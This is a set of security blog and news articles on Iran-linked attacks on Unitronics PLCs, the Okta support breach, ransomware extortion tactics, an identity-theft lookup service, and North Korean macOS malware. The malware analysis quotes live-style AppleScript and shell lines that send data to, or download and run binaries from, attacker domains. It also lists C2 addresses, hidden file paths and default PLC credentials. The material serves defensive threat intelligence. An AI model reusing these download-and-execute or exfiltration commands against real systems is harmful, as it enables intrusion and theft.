Iran-Backed Cyber Av3ngers Escalates Campaigns Against U.S. Critical Infrastructure

Earlier this week, CISA released an advisory warning of active exploitation of Programmable Logic Controllers (PLCs) used in Water and Wastewater treatment plants following intrusions into two U.S. critical infrastructure installations. The advisory and attacks come in the wake of increased public threats made by the Iran-backed Cyber Av3ngers “hacktivist” group to target industries using Israeli-manufactured OT and ICS equipment.

In this post, we describe the background to these attacks and detail recent Cyber Av3ngers activity, exploring the wider implications for critical infrastructure security and how organizations can mitigate these cyber risks.

Intrusion at the Municipal Water Authority of Aliquippa

On November 25, 2023, The Municipal Water Authority of Aliquippa disclosed an attack in which it lost control of one of the booster stations for the area. The attackers appear to have compromised a Unitronics PLC by exploiting weak or default passwords along with targeting the default and well-documented programming port for these devices.

The attackers renamed the PLC to “Gaza” and defaced the user interface.

Source: BeaverCountain.com

In addition, federal officials have indicated that a number of other water authorities on the east coast of the United States have been impacted by the Cyber Av3ngers, as well as at least one aquarium and a brewery. The Full Pint Beer brewery in Pittsburgh shared images on social media on 28th November showing similar defacement of a Unitronics PLCs in use as part of their control system.

Who Are Cyber Av3ngers?

Cyber Av3ngers is an IRGC-aligned threat actor whose primary mission is to sow discord and create a sense of heightened risk from technically unsophisticated hacks. The group has a history of making false claims such as breaching the Dorad power station. Attacks by the similarly-named Cyber Avengers, active since 2020, have been claimed by those operating the Cyber Av3ngers social media channels.

The recent attacks follow weeks of social media posturing by Cyber Av3ngers. On October 29, 2023, the group posted a promotional ‘countdown’ style video indicating that the group would be unveiling “one of the greatest cyber attacks on Israel infrastructure” within 24 hours.

CyberAv3ngers October 29th warning Telegram post

On October 30th, the Cyber Av3ngers initiated a series of posts across their Telegram and Twitter/X communication channels claiming to have infiltrated “10 Water treatment stations” across Israel. Prior to that, the same channels had been used to post a small set of files they claim had been exfiltrated from these targets.

Throughout the following weeks, the group maintained its social media campaign with threats to “wipe and destruct all industrial equipment such as SCADA systems, PLCs and HMIs”. However, it was only on 26th November that the group’s threats expanded to include targeting of all critical infrastructure, including plants in the U.S., found to be using equipment manufactured in, or associated with, Israel.

Targeting and Tooling

The current campaign targets Unitronics PLCs exposed to the public internet. A high-level search via Shodan indicates approximately 1800 Unitronics PLC devices are reachable globally. Around 280 of those are of the type in use by the Municipal Water Authority of Aliquippa.

Threat actors are scanning for exposed Unitronics devices listening on TCP port 20256, and when discovered, interrogating and where possible connecting to the vulnerable endpoint.

Cyber Av3ngers are known to use open source to conduct scanning, discovery and exploitation of OT and ICS devices. In particular, they leverage scripts specific to PCOM/TCP to query systems using Unitronics PLCs.

Industrial Control Systems equipment often comes with default passwords and backdoor ‘service’ or ‘admin’ accounts for remote administration. These are documented in publicly available operation manuals and represent a vulnerability if the installer or maintainer of the equipment did not take steps to change passwords and generally harden the devices against external attack.

Screenshots shared by the group on social media show the use of such open-source tools for scanning a range of exploitable ICS devices, including Siemens and SCADA devices.

Cyber Av3ngers & mr_soul_controller

The group has also previously exploited CVE-2023-28130, a remote command execution vulnerability in CheckPoint’s GAIA.

Cyber Av3ngers targeting CheckPoint GAIA

Additional Targeting of OT/ICS Equipment

The nature of many ICS/OT installations means they are often exposed to vulnerabilities and weak or unchanged default passwords. This, combined with their service-critical use, means they are both an easy and attractive target for threat actors.

Unsurprisingly, we find that Cyber Av3neger are neither the only nor the first group to target such systems. Unitronics PLCs, in particular, have also recently been singled out for targeting by another Gaza-related hacktivist group called ‘GhostSec’.

On October 13, 2023, GhostSec posted messages claiming to have hacked a number of Unitronics devices along with 27 Aegis devices used to control water pumps.

Mitigating Risks to Unitronics PLCs and Other ICS Devices

In order to harden exposed devices, administrators are urged to follow CISA’s recommendations:

  • Change the Unitronics PLC default password and validate that the default password “1111” is not in use.
  • Require MFA for remote access to the OT network, including from the IT network and external networks.
  • Disconnect the PLC from the open internet. If remote access is necessary, implement a Firewall/VPN in front of the PLC to control network access to the remote PLC. A VPN or gateway device can enable MFA if it is not supported by the device. Unitronics also has a secure cellular based longhaul transport device that is secure to their cloud services.
  • Back up the logic and configurations on any Unitronics PLCs to enable fast recovery. Become familiar with the process for factory resetting and deploying configurations to a device in the event of being hit by ransomware.
  • If possible, utilize a TCP port that is different from the default port TCP 20256. If available, use PCOM/TCP filters to parse out packets.
  • Update PLC/HMI to the latest version provided by Unitronics.

Conclusion

Groups escalating their presence and activities following the onset of the Israel-Hamas war are flooding social media with elaborate claims and grand threats of massive intrusions. Though inevitably exaggerated, groups like Cyber Av3ngers do present risk to critical infrastructure installations, albeit at present one that remains of low-impact. It is also important to see Cyber Av3ngers in the context of being an aspect of the IRGC. The goal here may be as much to do with Iranian-aligned propaganda as it is to do with causing material harm.

However, defenders should take such activity as an opportunity to understand weaknesses that need to be mitigated before more serious harm can be done. From a technical perspective, awareness continues to be paramount. Mitigating known risks will stop such opportunistic attacks from impacting devices and minimize the potential of service disruption.

To learn about how SentinelOne can help protect your organization from cyber threats, contact us or request a free demo.

Okta: Breach Affected All Customer Support Users

When KrebsOnSecurity broke the news on Oct. 20, 2023 that identity and authentication giant Okta had suffered a breach in its customer support department, Okta said the intrusion allowed hackers to steal sensitive data from fewer than one percent of its 18,000+ customers. But today, Okta revised that impact statement, saying the attackers also stole the name and email address for nearly all of its customer support users.

Okta acknowledged last month that for several weeks beginning in late September 2023, intruders had access to its customer support case management system. That access allowed the hackers to steal authentication tokens from some Okta customers, which the attackers could then use to make changes to customer accounts, such as adding or modifying authorized users.

In its initial incident reports about the breach, Okta said the hackers gained unauthorized access to files inside Okta’s customer support system associated with 134 Okta customers, or less than 1% of Okta’s customer base.

But in an updated statement published early this morning, Okta said it determined the intruders also stole the names and email addresses of all Okta customer support system users.

“All Okta Workforce Identity Cloud (WIC) and Customer Identity Solution (CIS) customers are impacted except customers in our FedRamp High and DoD IL4 environments (these environments use a separate support system NOT accessed by the threat actor),” Okta’s advisory states. “The Auth0/CIC support case management system was also not impacted by this incident.”

Okta said that for nearly 97 percent of users, the only contact information exposed was full name and email address. That means about three percent of Okta customer support accounts had one or more of the following data fields exposed (in addition to email address and name): last login; username; phone number; SAML federation ID; company name; job role; user type; date of last password change or reset.

Okta notes that a large number of the exposed accounts belong to Okta administrators — IT people responsible for integrating Okta’s authentication technology inside customer environments — and that these individuals should be on guard for targeted phishing attacks.

“Many users of the customer support system are Okta administrators,” Okta pointed out. “It is critical that these users have multi-factor authentication (MFA) enrolled to protect not only the customer support system, but also to secure access to their Okta admin console(s).”

While it may seem completely bonkers that some companies allow their IT staff to operate company-wide authentication systems using an Okta administrator account that isn’t protected with MFA, Okta said fully six percent of its customers (more than 1,000) persist in this dangerous practice.

In a previous disclosure on Nov. 3, Okta blamed the intrusion on an employee who saved the credentials for a service account in Okta’s customer support infrastructure to their personal Google account, and said it was likely those credentials were stolen when the employee’s personal device using the same Google account was compromised.

Unlike standard user accounts, which are accessed by humans, service accounts are mostly reserved for automating machine-to-machine functions, such as performing data backups or antivirus scans every night at a particular time. For this reason, they can’t be locked down with multifactor authentication the way user accounts can.

Dan Goodin over at Ars Technica reckons this explains why MFA wasn’t set up on the compromised Okta service account. But as he rightly points out, if a transgression by a single employee breaches your network, you’re doing it wrong.

“Okta should have put access controls in place besides a simple password to limit who or what could log in to the service account,” Goodin wrote on Nov. 4. “One way of doing this is to put a limit or conditions on the IP addresses that can connect. Another is to regularly rotate access tokens used to authenticate to service accounts. And, of course, it should have been impossible for employees to be logged in to personal accounts on a work machine. These and other precautions are the responsibility of senior people inside Okta.”

Goodin suggested that people who want to delve further into various approaches for securing service accounts should read this thread on Mastodon.

“A fair number of the contributions come from security professionals with extensive experience working in sensitive cloud environments,” Goodin wrote.

Leveraging the Law, Exposing Incriminating Data and Other New Tactics in Cyber Extortion

A little over a year ago, we described how ransomware operators had evolved their tactics from simple file locking to more sophisticated forms of extortion in Ransoms Without Ransomware, Data Corruption and Other New Tactics in Cyber Extortion. Since then, cybercrime actors have not stood still, and we are currently seeing the emergence of a brace of new tactics to wrest funds out of organizations and their clients in the wake of a business network compromise.

We observe that data theft and data destruction continue to be primary tools in the cybercriminal’s arsenal, along with partial and full file encryption. Added to that, however, we have begun to see the use of new levers that attempt to shame, blame or otherwise coerce victims into paying the ransom demanded by attackers.

In this post, we describe the emergence of these new tactics in cyber extortion to help defenders better understand the continuing development of threat actor behaviors.

Extortion Through Leveraging the Law

In mid-2023, the United States Securities and Exchange Commission approved updated requirements around cybersecurity incident reporting. These new requirements require that all companies disclose cybersecurity incidents, along with all the pertinent details, with the SEC within four days of becoming aware of a breach incident.

The new rules will require registrants to disclose on the new Item 1.05 of Form 8-K any cybersecurity incident they determine to be material and to describe the material aspects of the incident’s nature, scope, and timing, as well as its material impact or reasonably likely material impact on the registrant. An Item 1.05 Form 8-K will generally be due four business days [our emphasis] after a registrant determines that a cybersecurity incident is material. 

The new requirements are set to take effect from 18th December, 2023 for larger organizations and from June 2024 for all others. However, some ransomware operators have already adopted tactics that seek to leverage the new rules about breach disclosure to threaten victims even before they have taken effect.

On November 7th, the ALPHV gang breached MeridianLink in a data theft operation that did not involve the deployment of ransomware. The victim – a large financial services enterprise with dealings in mortgage lending, credit unions and banking products and services – subsequently stated that they became aware of the breach on November 10th.

According to the attackers, the victim was threatened with being reported to the SEC if they failed to pay within 24 hours.

On November 15, ALPHV added MeridianLink to its TOR-based data leaks website along with excerpts and screenshots of the complaint they filed to the SEC alleging that the enterprise had failed to report the breach within four days.

Source: databreaches.net

Although in this case the rules were not in force at the time, it is clear that going forward threat actors will use this as a tactic to pressure victims. The aim would appear to be to prevent organizations stalling for time while trying to mitigate the damage, negotiate the payment amount, or otherwise avoid revealing the disclosure to their partners, clients and other affected parties.

The Threat of Exposing Incriminating Data

While the threat of exposing stolen data has now been used for some time as an additional form of leverage, there have been few cases where the nature of the data itself has been used to pressure a victim to pay. Where those have occurred, they have centered around sensitive, proprietary data that companies would not wish to fall into the hands of competitors.

However, a recent breach by affiliates of the Rhysida ransomware operation was followed by a threat to publish data that itself constitutes a criminal offense for the victim to possess. In this case, the ransomware operators allege that data stolen from Mount St. Mary’s Seminary, a school that prepares “candidates for the Catholic priesthood”, contained “child erotica”.

“Ready to provide evidence of child erotica stored on this network. Willing to cooperate with detectives and journalists. These materials will not be published on our site.”

The implications here are complex and concerning. Even the allegation of such threatens the reputation of the victim organization, even if untrue. It is easy for threat actors to make damaging claims and refuse to provide the evidence. As a tactic, threatening to publicize such claims can exert pressure on victim organizations, particularly if they cannot verify for themselves whether such data exists.

If true, there are obvious legal implications and reputational consequences for the organization even if the crime is the sole responsibility of a single individual. In such circumstances, threat actors can ramp up the pressure on victims to pay in the hope that the data will not be exposed to law enforcement.

While the specific nature of the incriminating data in this incident may not be (one would like to think) something widely found on business networks, the greater lesson is that threat actors can and will leverage not only business data but also personal employee data that may be stored on compromised business computers.

Enterprises need to ensure that strict policies are in place to prevent employees using organizational computers for personal use, and that these policies are enforced, along with ensuring all endpoints are properly protected against compromise.

Trading Victims Off Against GDPR & Other Regulators

Ever since 2018, GDPR and similar regulations have had an important impact on the way companies store and retain data. Backed by the threat of heavy financial penalties, GDPR is a powerful motivator to ensure organizations prioritize data privacy in their operations.

Threat actors have leveraged the threat of penalties for breaching GDPR rules in the past. For example, in 2021, DoppelPaymer successor Grief (aka PayorGrief) cited GDPR violations to exert pressure on victims.

Grief victim portal referencing GDPR regulations (from May 2021)

However, more forceful GDPR-related threats have been observed in 2023. The previously mentioned ALPHV gang attempts to pressure victims by scaring their customer base. On  November 14, 2023, the organization “Naftor and Groupa Pern” was added to the ALPHV blog with scare text claiming the company did not observe GDPR rules and that its customers’ data could be leaked as a result.

WARNING!

COOPERATION WITH NAFTOR AND GRUPA PERN MAY RESULT IN THE LEAKAGE OF YOUR DATA. THESE COMPANIES DO NOT COMPLY WITH THE LAWS OF THE EUROPEAN UNION AND IN PARTICULAR THE GDPR. YOU MAY INCUR LEGAL AND FINANCIAL RISKS BY WORKING WITH THEM!

More direct leverage of GDPR was recently seen as a tactic used by the short-lived and now-defunct Ransomed.VC gang. This group threatened victims with disclosure of GDPR violations in the event they did not conform to the ransom demands. The extortion demands would be purposefully set at a price lower than the potential GDPR fines in an attempt to entice the victim to pay by offering a less financially-painful option.

Ransomed.VC  site banner
Ransomed.VC  site banner

Conclusion

Legal frameworks such as the SEC’s new cybersecurity incident reporting rules, GDPR regulations and standing laws on prohibited data are being exploited to exert further pressure on vulnerable organizations. These latest cyber tactics attempt to force victims into meeting ransom demands by raising fears of both legal liability and reputational damage.

The emergence of such tactics underscores the need for organizations to strengthen their cybersecurity posture, ensure compliance with regulatory requirements and to remain prepared for the evolving nature of today’s cyber threats. Cybercriminals are highly motivated to develop new and creative ways to extort businesses, and cyber defenders need to remain vigilant and adaptive in their strategies to defend against these evolving threats.

To learn about how SentinelOne can help protect your organization from ransomware and other threats, contact us or request a free demo.

ID Theft Service Resold Access to USInfoSearch Data

One of the cybercrime underground’s more active sellers of Social Security numbers, background and credit reports has been pulling data from hacked accounts at the U.S. consumer data broker USinfoSearch, KrebsOnSecurity has learned.

Since at least February 2023, a service advertised on Telegram called USiSLookups has operated an automated bot that allows anyone to look up the SSN or background report on virtually any American. For prices ranging from $8 to $40 and payable via virtual currency, the bot will return detailed consumer background reports automatically in just a few moments.

USiSLookups is the project of a cybercriminal who uses the nicknames JackieChan/USInfoSearch, and the Telegram channel for this service features a small number of sample background reports, including that of President Joe Biden, and podcaster Joe Rogan. The data in those reports includes the subject’s date of birth, address, previous addresses, previous phone numbers and employers, known relatives and associates, and driver’s license information.

JackieChan’s service abuses the name and trademarks of Columbus, OH based data broker USinfoSearch, whose website says it provides “identity and background information to assist with risk management, fraud prevention, identity and age verification, skip tracing, and more.”

“We specialize in non-FCRA data from numerous proprietary sources to deliver the information you need, when you need it,” the company’s website explains. “Our services include API-based access for those integrating data into their product or application, as well as bulk and batch processing of records to suit every client.”

As luck would have it, my report was also listed in the Telegram channel for this identity fraud service, presumably as a teaser for would-be customers. On October 19, 2023, KrebsOnSecurity shared a copy of this file with the real USinfoSearch, along with a request for information about the provenance of the data.

USinfoSearch said it would investigate the report, which appears to have been obtained on or before June 30, 2023. On Nov. 9, 2023, Scott Hostettler, general manager of USinfoSearch parent Martin Data LLC shared a written statement about their investigation that suggested the ID theft service was trying to pass off someone else’s consumer data as coming from USinfoSearch:

Regarding the Telegram incident, we understand the importance of protecting sensitive information and upholding the trust of our users is our top priority. Any allegation that we have provided data to criminals is in direct opposition to our fundamental principles and the protective measures we have established and continually monitor to prevent any unauthorized disclosure. Because Martin Data has a reputation for high-quality data, thieves may steal data from other sources and then disguise it as ours. While we implement appropriate safeguards to guarantee that our data is only accessible by those who are legally permitted, unauthorized parties will continue to try to access our data. Thankfully, the requirements needed to pass our credentialing process is tough even for established honest companies.

USinfoSearch’s statement did not address any questions put to the company, such as whether it requires multi-factor authentication for customer accounts, or whether my report had actually come from USinfoSearch’s systems.

After much badgering, on Nov. 21 Hostettler acknowledged that the USinfoSearch identity fraud service on Telegram was in fact pulling data from an account belonging to a vetted USinfoSearch client.

“I do know 100% that my company did not give access to the group who created the bots, but they did gain access to a client,” Hostettler said of the Telegram-based identity fraud service. “I apologize for any inconvenience this has caused.”

Hostettler said USinfoSearch heavily vets any new potential clients, and that all users are required to undergo a background check and provide certain documents. Even so, he said, several fraudsters each month present themselves as credible business owners or C-level executives during the credentialing process, completing the application and providing the necessary documentation to open a new account.

“The level of skill and craftsmanship demonstrated in the creation of these supporting documents is incredible,” Hostettler said. “The numerous licenses provided appear to be exact replicas of the original document. Fortunately, I’ve discovered several methods of verification that do not rely solely on those documents to catch the fraudsters.”

“These people are unrelenting, and they act without regard for the consequences,” Hostettler continued. “After I deny their access, they will contact us again within the week using the same credentials. In the past, I’ve notified both the individual whose identity is being used fraudulently and the local police. Both are hesitant to act because nothing can be done to the offender if they are not apprehended. That is where most attention is needed.”

SIM SWAPPER’S DELIGHT

JackieChan is most active on Telegram channels focused on “SIM swapping,” which involves bribing or tricking mobile phone company employees into redirecting a target’s phone number to a device the attackers control. SIM swapping allows crooks to temporarily intercept the target’s text messages and phone calls, including any links or one-time codes for authentication that are delivered via SMS.

Reached on Telegram, JackieChan said most of his clients hail from the criminal SIM swapping world, and that the bulk of his customers use his service via an application programming interface (API) that allows customers to integrate the lookup service with other web-based services, databases, or applications.

“Sim channels is where I get most of my customers,” JackieChan told KrebsOnSecurity. “I’m averaging around 100 lookups per day on the [Telegram] bot, and around 400 per day on the API.”

JackieChan claims his USinfoSearch bot on Telegram abuses stolen credentials needed to access an API used by the real USinfoSearch, and that his service was powered by USinfoSearch account credentials that were stolen by malicious software tied to a botnet that he claims to have operated for some time.

This is not the first time USinfoSearch has had trouble with identity thieves masquerading as legitimate customers. In 2013, KrebsOnSecurity broke the news that an identity fraud service in the underground called “SuperGet[.]info” was reselling access to personal and financial data on more than 200 million Americans that was obtained via the big-three credit bureau Experian.

The consumer data resold by Superget was not obtained directly from Experian, but rather via USinfoSearch. At the time, USinfoSearch had a contractual agreement with a California company named Court Ventures, whereby customers of Court Ventures had access to the USinfoSearch data, and vice versa.

When Court Ventures was purchased by Experian in 2012, the proprietor of SuperGet — a Vietnamese hacker named Hieu Minh Ngo who had impersonated an American private investigator — was grandfathered in as a client. The U.S. Secret Service agent who oversaw Ngo’s capture, extradition, prosecution and rehabilitation told KrebsOnSecurity he’s unaware of any other cybercriminal who has caused more material financial harm to more Americans than Ngo.

REAL POLICE, FAKE EDRS

JackieChan also sells access to hacked email accounts belonging to law enforcement personnel in the United States and abroad. Hacked police department emails can come in handy for ID thieves trying to pose as law enforcement officials who wish to purchase consumer data from platforms like USinfoSearch. Hence, Mr. Hostettler’s ongoing battle with fraudsters seeking access to his company’s service.

These police credentials are mainly marketed to criminals seeking fraudulent “Emergency Data Requests,” wherein crooks use compromised government and police department email accounts to rapidly obtain customer account data from mobile providers, ISPs and social media companies.

Normally, these companies will require law enforcement officials to supply a subpoena before turning over customer or user records. But EDRs allow police to bypass that process by attesting that the information sought is related to an urgent matter of life and death, such as an impending suicide or terrorist attack.

In response to an alarming increase in the volume of fraudulent EDRs, many service providers have chosen to require all EDRs be processed through a service called Kodex, which seeks to filter EDRs based on the reputation of the law enforcement entity requesting the information, and other attributes of the requestor.

For example, if you want to send an EDR to Coinbase or Twilio, you’ll first need to have valid law enforcement credentials and create an account at the Kodex online portal at these companies. However, Kodex may still throttle or block any requests from any accounts if they set off certain red flags.

Within their own separate Kodex portals, Twilio can’t see requests submitted to Coinbase, or vice versa. But each can see if a law enforcement entity or individual tied to one of their own requests has ever submitted a request to a different Kodex client, and then drill down further into other data about the submitter, such as Internet address(es) used, and the age of the requestor’s email address.

In August, JackieChan was advertising a working Kodex account for sale on the cybercrime channels, including redacted screenshots of the Kodex account dashboard as proof of access.

Kodex co-founder Matt Donahue told KrebsOnSecurity his company immediately detected that the law enforcement email address used to create the Kodex account pictured in JackieChan’s ad was likely stolen from a police officer in India. One big tipoff, Donahue said, was that the person creating the account did so using an Internet address in Brazil.

“There’s a lot of friction we can put in the way for illegitimate actors,” Donahue said. “We don’t let people use VPNs. In this case we let them in to honeypot them, and that’s how they got that screenshot. But nothing was allowed to be transmitted out from that account.”

Massive amounts of data about you and your personal history are available from USinfoSearch and dozens of other data brokers that acquire and sell “non-FCRA” data — i.e., consumer data that cannot be used for the purposes of determining one’s eligibility for credit, insurance, or employment.

Anyone who works in or adjacent to law enforcement is eligible to apply for access to these data brokers, which often market themselves to police departments and to “skip tracers,” essentially bounty hunters hired to locate others in real life — often on behalf of debt collectors, process servers or a bail bondsman.

There are tens of thousands of police jurisdictions around the world — including roughly 18,000 in the United States alone. And the harsh reality is that all it takes for hackers to apply for access to data brokers (and abuse the EDR process) is illicit access to a single police email account.

The trouble is, compromised credentials to law enforcement email accounts show up for sale with alarming frequency on the Telegram channels where JackieChan and their many clients reside. Indeed, Donahue said Kodex so far this year has identified attempted fake EDRs coming from compromised email accounts for police departments in India, Italy, Thailand and Turkey.

DPRK Crypto Theft | macOS RustBucket Droppers Pivot to Deliver KandyKorn Payloads

North Korean-aligned threat actors targeting macOS have had a busy 2023, with two major campaigns noted so far: RustBucket and KandyKorn. The initial RustBucket campaign used a second-stage malware, dubbed ‘SwiftLoader’, which functioned externally as a PDF Viewer for a lure document sent to targets. While victims viewed the lure, SwiftLoader retrieved and executed a further stage malware written in Rust. The KandyKorn campaign, meanwhile, was an elaborate multi-stage operation targeting blockchain engineers of a crypto exchange platform. Python scripts were used to drop malware that hijacked the host’s installed Discord app, and subsequently delivered a backdoor RAT written in C++ dubbed ‘KandyKorn’.

Our analysis of further activity in these campaigns suggests that DPRK threat actors are now ‘mixing and matching’ components from these operations, with SwiftLoader droppers being used to deliver KandyKorn payloads. In this post, we provide an extensive review of this activity and provide further indicators to help security teams defend their organizations.

Overview of KandyKorn

Research by Elastic published in early November 2023 described a sophisticated intrusion by DPRK-aligned threat actors. The compromise involved a five-stage attack that began with social engineering via Discord to trick targets into downloading a malicious Python application disguised as a cryptocurrency arbitrage bot, a popular tool among crypto traders. The Python application was distributed as Cross-Platform Bridges.zip and contained multiple benign Python scripts. We summarize the previous research into KandyKorn as follows:

Overview of Operation KandyKorn
Overview of Operation KandyKorn

Stage 0

A Discord user is socially engineered into downloading a malicious Python application, Cross-Platform Bridges.zip. Initially, links to the malware were sent to targets via direct message with the malware hosted on Google drive.

https[:]//drive.google[.]com/file/d1KW5nQ8MZccug6Mp4QtKyWLT3HIZzHNIL2

The application’s Main.py script imports the included Watcher.py file as a module.

Stage 1

Watcher.py checks the local Python version and downloads and executes testSpeed.py. The script downloads and executes another Python script, FinderTools. The former is deleted after execution while the latter is written to /Users/Shared/FinderTools.

Stage 2

FinderTools downloads and executes a Mach-O binary, dubbed SUGARLOADER, at /Users/Shared/.sld. The same file is also copied twice as .log and as appname, both within the Discord application’s hierarchy at /Applications/Discord.app/Contents/MacOS/.

Written in C++, SUGARLOADER checks for the existence of a configuration file at /Library/Caches/com.apple.safari.ck and downloads it from a remote C2 if missing. The C2 address is hardcoded into the FinderTools script and passed as an execution argument to the SUGARLOADER binary on the command line.

In the intrusion seen by Elastic, the C2 used by FinderTools was hosted on the domain tp.globa.xyz.

tp-globa.xyz/OdhLca1mLUp/lZ5rZPxWsh/7yZKYQI43S/fP7savDX6c/bfC

Stage 3

SUGARLOADER also downloads a Mach-O payload dubbed HLOADER and writes it to /Applications/Discord.app/Contents/MacOS/Discord. The genuine Discord executable is renamed as .lock in the same directory.

HLOADER
HLOADER

After this replacement, when Discord is launched, HLOADER renames itself to MacOS.tmp, renames the .lock file back to Discord, and executes both the genuine Discord binary and the SUGARLOADER executable saved as .log. This causes the entire renaming/reloading process to repeat.

On the assumption that the victim is likely to launch Discord frequently, the purpose of HLOADER is to provide a persistence mechanism that will not be detected by Apple’s monitoring of background login items.

Stage 4

SUGARLOADER retrieves a C2 URL from the configuration file previously stored at com.apple.safari.ck. In the observed intrusion, this was 23.254.226[.]90, communicating over TCP port 44.

SUGARLOADER uses this to retrieve and execute the KANDYKORN remote access trojan in-memory via NSCreateObjectFileImageFromMemory and NSLinkModule. This technique has been used previously in North Korean macOS malware, starting with UnionCryptoTrader back in 2019.

Building off Elastic’s research, we identified a number of other versions of KANDYKORN RAT, with the following SHA1s:

SHA1 First Seen
62267b88fa6393bc1f1eeb778e4da6b564b7011e Apr 2023
8f6c52d7e82fbfdead3d66ad8c52b372cc9e8b18 Apr 2023
ac336c5082c2606ab8c3fb023949dfc0db2064d5 Apr 2023
26ec4630b4d1116e131c8e2002e9a3ec7494a5cf Aug 2023
46ac6dc34fc164525e6f7886c8ed5a79654f3fd3 Aug 2023
8d5d214c490eae8f61325839fcc17277e514301e Aug 2023
9f97edbc1454ef66d6095f979502d17067215a9d Aug 2023
c45f514a252632cb3851fe45bed34b175370d594 Aug 2023
ce3705baf097cd95f8f696f330372dd00996d29a Aug 2023
e244ff1d8e66558a443610200476f98f653b8519 Aug 2023
e77270ac0ea05496dd5a2fbccba3e24eb9b863d9 Aug 2023
e68bfa72a4b4289a4cc688e81f9282b1f78ebc1f Nov 2023

Interesting among these is 26ec4630b4d1116e131c8e2002e9a3ec7494a5cf, which is written to /Users/Shared/.pld, a point we will return to below.

Recent RustBucket activity

In what at first sight appears to be an entirely different campaign, North Korean threat actors have an ongoing and evolving campaign first disclosed by JAMF dubbed RustBucket. This campaign initially involved a first stage AppleScript applet and a Swift-based application bundle called ‘Internal PDF Viewer.app’, which used specially crafted PDFs to unlock code for downloading a Rust-based payload.

A number of RustBucket variants have since been sighted. Additionaly, several variations of the Swift-based stager, collectively dubbed SwiftLoader, have come to light over the last few months.

While some of these continued to be distributed with the name “InternalPDF Viewer”, in June researchers spotted a variant called SecurePDF Viewer.app. This application was signed and notarized by Apple (since revoked) by a developer with the name “BBQ BAZAAR PRIVATE LIMITED (7L2UQTVP6F)”. SecurePDF Viewer.app requires at least macOS 12.6 (Monterey), and has the bundle identifier com.softwaredev.swift-ui-test. It is capable of running on both Intel and Apple silicon devices.

The main executable uses curl to reach out to docs-send.online/getBalance/usdt/ethereum. This retrieves a file called /gatewindow/1027/shared/ (c806c7006950dea6c20d3d2800fe46d9350266b6), an AppleScript script that when executed posts the filepath of the executing process to a remote server hosted on swissborg.blog.

set sdf to (POSIX path of (path to me))
set aaas to do shell script "curl -H "Content-Type:application/json" -d '{"zip":""
""}' https[:]//swissborg[.]blog/tx/10299301992/hash"
--display dialog aaas
run script aaas
--display dialog "Can 't open this file. The file maybe damaged."

Connection to ObjCShellz

The swissborg.blog domain contacted by SecurePDF Viewer was previously mentioned by JAMF in an article in early November.

JAMF researchers described what appeared to them as a late stage RustBucket payload distributed as a Mach-O binary called ProcessRequest. The researchers dubbed the malware ObjCShellz, in light of the fact that the code was written in Objective-C and functions to execute simple shell commands from a remote C2 via the system() function invoking sh -c.

Our research shows that ObjCShellz is highly likely a later stage of the SwiftLoader SecurePDF Viewer.app.

SwiftLoader Connection to KandyKorn RAT

Other versions of SwiftLoader have been spotted in the wild, including one distributed in a lure called Crypto-assets and their risks for financial stability[.]app[.]zip.

This application is also signed and notarized by Apple (since revoked) by a developer with the name “Northwest Tech-Con Systems Ltd (2C4CB2P247)”. The bundle identifier is com.EdoneViewer and the app’s main executable is EdoneViewer.

There are some interesting overlaps between this version of SwiftLoader and the KandyKorn operation.

Our analysis of EdoneViewer shows it contains a hardcoded URL encoded with a single-byte XOR key of Ox40.

Once decoded, we can see the malware reaches out to the domain on-global.xyz and drops a hidden executable at /Users/Shared/.pw.

D%3D", "http[:]//on-global[.]xyz/Of56cYsfVV8/OJITWH2WFx/Jy5S7hSx0K/fP7saoiPBc/A%3D%3D", 
"/users/shared/Crypto-assets and their risks for financial stability.pdf", "/users/shared/.pw"}
do shell script "curl -o "" & p & "" " & d & a & "&& open "" & p & """ & "&& 
curl -o " & b & " " & s & a & " -d pw" & "&& chmod 770 " & b & "&& 
/bin/zsh -c "" & b & " " & s & " &" &> /dev/null"

We note that the KandyKorn Python script FinderTools reached out for its next stage to malware hosted on the domain tp.globa.xyz and that SUGARLOADER dropped hidden files at /Users/Shared/.sld.

The .pw executable, named download.bin on VirusTotal (060a5d189ccf3fc32a758f1e218f814f6ce81744), takes the URL hardcoded in the EdoneViewer binary as a launch argument. Unfortunately, the C2 did not respond with a download on our test, but the file contains a hardcoded reference to /Users/Shared/.pld for the download path.

Recall that we discovered a variant of KANDYKORN RAT with the same file name .pld above (26ec4630b4d1116e131c8e2002e9a3ec7494a5cf). We assess with medium confidence that /Users/Shared/.pld refers to the same .pld KandyKorn RAT given the overlaps in infrastructure, objectives and TTPs noted here and by previously mentioned researchers.

SentinelOne Customers Protected from KandyKorn and RustBucket Malware

SentinelOne Singularity detects and protects against all known components of KandyKorn and RustBucket malware.

Conclusion

Our analysis has established new connections between previous research findings. We note specific shared infrastructure that indicates a link between ObjCShellz payloads and SwiftLoader stagers. We also provide the first clues that RustBucket droppers and KandyKorn payloads are likely being shared as part of the same infection chain.

Our analysis corroborates findings from other researchers that North Korean-linked threat actors’ tendency to reuse shared infrastrucutre affords us the opportunity to widen our understanding of their activity and discover fresh indicators of compromise. Below we provide a list of indicators we observed and analyzed in this research.

Indicators of Compromise

SUGARLOADER
d28830d87fc71091f003818ef08ff0b723b3f358

HLOADER
43f987c15ae67b1183c4c442dc3b784faf2df090

KANDYKORN RAT
26ec4630b4d1116e131c8e2002e9a3ec7494a5cf
46ac6dc34fc164525e6f7886c8ed5a79654f3fd3
62267b88fa6393bc1f1eeb778e4da6b564b7011e
8d5d214c490eae8f61325839fcc17277e514301e
8f6c52d7e82fbfdead3d66ad8c52b372cc9e8b18
9f97edbc1454ef66d6095f979502d17067215a9d
ac336c5082c2606ab8c3fb023949dfc0db2064d5
c45f514a252632cb3851fe45bed34b175370d594
ce3705baf097cd95f8f696f330372dd00996d29a
e244ff1d8e66558a443610200476f98f653b8519
e68bfa72a4b4289a4cc688e81f9282b1f78ebc1f
e77270ac0ea05496dd5a2fbccba3e24eb9b863d9

ObjCShell
79337ccda23c67f8cfd9f43a6d3cf05fd01d1588

SecurePDF Viewer
a1a8a855f64a6b530f5116a3785a693d78ec09c0
e275deb68cdff336cb4175819a09dbaf0e1b68f6

Crypto-assets and their risks for financial stability.app
09ade0cb777f4a4e0682309a4bc1d0f7d4d7a036
5c93052713f317431bf232a2894658a3a4ebfad9
884cebf1ad0e65f4da60c04bc31f62f796f90d79
be903ded39cbc8332cefd9ebbe7a66d95e9d6522

Downloader
060a5d189ccf3fc32a758f1e218f814f6ce81744

Remotely-hosted AppleScript
3c887ece654ea46b1778d3c7a8a6a7c7c7cfa61c
c806c7006950dea6c20d3d2800fe46d9350266b6

